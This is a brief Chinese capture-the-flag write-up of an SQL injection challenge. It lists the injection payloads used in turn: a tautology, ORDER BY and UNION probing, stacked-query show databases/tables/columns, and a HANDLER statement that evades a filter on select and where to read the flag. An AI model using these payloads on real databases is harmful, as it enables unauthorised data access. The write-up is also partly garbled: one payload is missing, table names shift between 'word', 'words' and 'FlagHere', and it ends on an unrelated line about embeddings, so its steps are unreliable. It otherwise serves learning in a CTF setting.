这是一道sql注入题目
先输入1看看
显示了一些不知道什么东西
尝试
1' or 1=1 #万能密码
看上去也没有一些有用的信息
然后尝试 联合注入查询
1' ORDER BY 3#
也没有什么有用的
尝试union注入
1' union select 1,2#
这里回显了被过滤的关键词,很明显后端把
select、where这些核心关键字都加入了过滤规则。
先用show databases爆破数据库
'
看来有用
然后进一步show tables爆破表
看到了有个"数字串"的表和"word"表
1'; show columns from words; #
1'; show columns from `1919810931114514`; #
分别爆破这两个表看看 column列
再数字的表里面看到了flag
由于过滤了where select等字段 所以需要绕过这些字段 再不断尝试和学习 加上之前的积累
使用
1';HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#
注入后就可以得到flag
上下文嵌入向量(contextualized embedding))
